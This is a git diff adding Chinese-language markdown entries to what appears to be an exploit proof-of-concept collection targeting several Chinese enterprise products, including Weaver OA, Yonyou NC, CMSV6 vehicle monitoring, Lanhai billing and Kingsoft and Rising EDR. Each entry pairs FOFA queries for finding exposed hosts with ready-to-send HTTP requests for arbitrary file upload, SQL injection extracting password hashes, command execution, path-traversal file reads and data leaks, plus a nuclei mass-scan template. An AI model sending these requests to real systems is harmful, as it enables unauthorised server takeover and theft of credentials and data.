+![image-20240524185349211](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405241859545.png) + + + diff --git a/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md b/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md new file mode 100644 index 0000000..121d6b1 --- /dev/null +++ b/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md 
@@ -0,0 +1,42 @@ +## 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞 + +智慧校园(安校易)管理系统 FileUpProductupdate.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +``` +title="智慧综合管理平台登入" +``` + + + +## poc + +``` +POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=----21909179191068471382830692394 +Connection: close + +------21909179191068471382830692394 +Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx" +Content-Type: image/jpeg + +<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%> +------21909179191068471382830692394-- +``` + +![image-20240524230505271](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242305328.png) + + + +文件路径 + +``` +/Upload/Publish/000000/0_0_0_0/update.aspx +``` + diff --git a/泛微E-Office10-OfficeServer任意文件上传漏洞.md b/泛微E-Office10-OfficeServer任意文件上传漏洞.md new file mode 100644 index 0000000..f61204c --- /dev/null +++ b/泛微E-Office10-OfficeServer任意文件上传漏洞.md 
@@ -0,0 +1,47 @@ +## 泛微E-Office10-OfficeServer任意文件上传漏洞 + + 泛微OA E-0ffice 10 OfficeServer.php 存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器敏感信息。 + +## fofa + +``` +app="泛微-EOffice" + +body="eoffice_loading_tip" && body="eoffice10" +``` + + + +## poc + +``` +POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 395 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs +Accept-Encoding: gzip, deflate +Connection: close + +------WebKitFormBoundaryJjb5ZAJOOXO7fwjs +Content-Disposition: form-data; name="FileData"; filename="1.jpg" +Content-Type: image/jpeg + + +------WebKitFormBoundaryJjb5ZAJOOXO7fwjs +Content-Disposition: form-data; name="FormData" + +{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'} +------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- +``` + +![image-20240524231729186](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242317261.png) + + + +文件路径 + +``` +http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php +``` + diff --git a/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md b/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md new file mode 100644 index 0000000..8c07676 --- /dev/null +++ b/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md 
@@ -0,0 +1,53 @@ +## 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202) + +泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。 + +## fofa + +``` +app="泛微-协同办公OA" +``` + + + +## poc + +``` +/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405241359251.png) + + + +## nuclei批量yaml文件 + +``` +id: ecology-loginSSO-sql-CNVD-2021-33202 +info: + name: Template Name + author: mhb17 + severity: critical + description: description + reference: + - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html + tags: ecology,sqli +requests: + - raw: + - | + GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + matchers-condition: and + matchers: + - type: word + part: header + words: + - '200' + - type: regex + part: body + regex: + - '[0-9A-F]{32}' +``` + diff --git a/瑞星EDR-XSS漏洞可打管理员cookie.md b/瑞星EDR-XSS漏洞可打管理员cookie.md new file mode 100644 index 0000000..02ede78 --- /dev/null +++ b/瑞星EDR-XSS漏洞可打管理员cookie.md @@ -0,0 +1,23 @@ +## 瑞星EDR-XSS漏洞可打管理员cookie + + + +## poc + +``` +POST /ESM/WebService/ServerOperate.asmx HTTP/1.1 +Host: 192.168.102.132 +Content-Type: text/xml; charset=utf-8 +Content-Length: 536 +SOAPAction: "Rising.ESM.WebUI.WebService/SendWaring" + + + + + + {"logid":1,"type":1,"caption":"aaaaaa","content":"aaa","date":"2022-07-04 11:05","state":1,"desc":"xxxxxxx"} + + + +``` + 
diff --git a/用友NC-warningDetailInfo接口存在SQL注入漏洞.md b/用友NC-warningDetailInfo接口存在SQL注入漏洞.md new file mode 100644 index 0000000..0373602 --- /dev/null +++ b/用友NC-warningDetailInfo接口存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 用友NC-warningDetailInfo接口存在SQL注入漏洞 + +用友NC /ebvp/[infopub](https://cn-sec.com/archives/tag/infopub)/warningDetailInfo接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +影响范围:NC63、NC633、NC65 + +## fofa + +``` +app="用友-UFIDA-NC" +``` + +## poc + +``` +GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![用友NC warningDetailInfo接口存在SQL注入漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251322607.png) \ No newline at end of file diff --git a/用友nc电子采购信息系统securitycheck存在sql注入.md b/用友nc电子采购信息系统securitycheck存在sql注入.md new file mode 100644 index 0000000..790d054 --- /dev/null +++ b/用友nc电子采购信息系统securitycheck存在sql注入.md 
@@ -0,0 +1,33 @@ +## 用友nc电子采购信息系统securitycheck存在sql注入 + + + +## fofa + +``` +body="UClient.dmg" +``` + + + +## poc + +``` +POST /ebs/securitycheck HTTP/1.1 +Host: ip +Content-Length: 237 +Method: POST securitycheck HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Accept: */* +Origin: http://ip +Referer: http://ip/ebs/core/login/login.jsp +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=691A17DA3C872E1E35BACBE499022DE4.server; JSESSIONID=D80A3F043CD6E898C2076206848019D9.server +Connection: close + +&accountCode=ERP%E7%B3%BB%E7%BB%9F&accountCodeValue=0001&datasource=design&corpCode=&maxWindow=0&compressStream=1&corpName=&workdate=123-09-22&userId=11' AND 1129=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(121)||CHR(69)||CHR(110),5) AND 'Fjnc'='Fjnc&password=11&&pageUniqueId=328c7f3e-aea1-4bcf-bd91-05e0d2804719&pageId=login&isAjax=1 +``` + +![image-20240525131651949](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251316035.png) \ No newline at end of file diff --git a/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md b/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md new file mode 100644 index 0000000..258bae5 --- /dev/null +++ b/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md 
@@ -0,0 +1,23 @@
+## 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞
+
+蓝海卓越计费管理系统存在debug.php远程命令执行漏洞
+
+## poc
+
+```
+POST /debug.php?_t=0.297317996068593 HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Length: 12
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=n8n03vmefnnrejq35697pbivl6
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+
+cmd=ls
+```
+
+![image-20240525134604450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251346523.png)
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md b/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md
new file mode 100644
index 0000000..c4aae68
--- /dev/null
+++ b/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+## 蓝海卓越计费管理系统存在download.php任意文件读取漏洞
+
+
+
+## fofa
+
+```
+title="蓝海卓越计费管理系统"
+```
+
+
+
+## poc
+
+```
+GET /download.php?file=../../../../../usr/local/usr-gui/download.php HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Length: 12
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=n8n03vmefnnrejq35697pbivl6
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+```
+
+![image-20240525134843597](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251348660.png)
\ No newline at end of file
diff --git a/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md b/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md
index 5443cca..d922d08 100644
--- a/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md
+++ b/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md
@@ -9,16 +9,20 @@ body="./open/webApi.html"||body="/808gps/"
 ## poc
 ```
 POST /inspect_file/upload HTTP/1.1
-Host:
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
 Accept: */*
-content-Length: 238
-Content-Type: multipart/form-data;boundary=-----------------------------7db372eb000e2
+Connection: close
+Content-Length: 226
+Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b
 
------------------------------7db372eb000e2
-Content-Disposition: form-data; name="uploadFile"; filename="1.jsp"
+--2e7688d712bcc913201f327059f9976b
+Content-Disposition: form-data; name="uploadFile"; filename="../707140.jsp"
 Content-Type: application/octet-stream
 
-<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
------------------------------7db372eb000e2--
+<% out.println("007319607"); %>
+--2e7688d712bcc913201f327059f9976b--
 ```
+
+![image-20240524224902984](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242249085.png)
diff --git a/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md b/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md
new file mode 100644
index 0000000..3291e8a
--- /dev/null
+++ b/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md
@@ -0,0 +1,24 @@
+## 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)
+
+
+
+## fofa
+
+```
+ody="/808gps/"
+```
+
+
+
+## poc
+
+```
+GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
diff --git a/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md
new file mode 100644
index 0000000..1224558
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md
@@ -0,0 +1,25 @@
+## 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞
+
+通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞
+
+## fofa
+
+```
+body="/808gps/"
+```
+
+## poc
+
+```
+POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
+Connection: close
+Content-Length: 9
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+
+json=null
+```
+
+![1708927720796.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242252677.png)
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md b/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md
new file mode 100644
index 0000000..28654e1
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md
@@ -0,0 +1,18 @@
+## 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞
+
+
+
+
+## poc
+
+```
+POST /xz_center/list HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+
+page=1
+```
+
diff --git a/金山云EDR任意文件上传漏洞.md b/金山云EDR任意文件上传漏洞.md
new file mode 100644
index 0000000..7a20e50
--- /dev/null
+++ b/金山云EDR任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+## 金山云EDR任意文件上传漏洞
+
+
+
+## poc
+
+```
+POST /softmanagement/distribute/save_tools.php HTTP/1.1
+Host: *:6868
+Content-Length: 582
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: null
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykMPE1WkVUSahanwB
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundarykMPE1WkVUSahanwB
+Content-Disposition: form-data; name="toolFile"; filename="2.php."
+Content-Type: image/png
+
+1111111
+------WebKitFormBoundarykMPE1WkVUSahanwB
+Content-Disposition: form-data; name="submit"
+
+提交
+------WebKitFormBoundarykMPE1WkVUSahanwB
+Content-Disposition: form-data; name="size"
+
+500
+------WebKitFormBoundarykMPE1WkVUSahanwB
+Content-Disposition: form-data; name="userSession"
+
+1111111
+------WebKitFormBoundarykMPE1WkVUSahanwB
+Content-Disposition: form-data; name="modeID"
+
+5
+------WebKitFormBoundarykMPE1WkVUSahanwB--
+```
+
+文件路径
+
+```
+http://192.168.37.134:6868/softmanagement/files/2.php
+```
+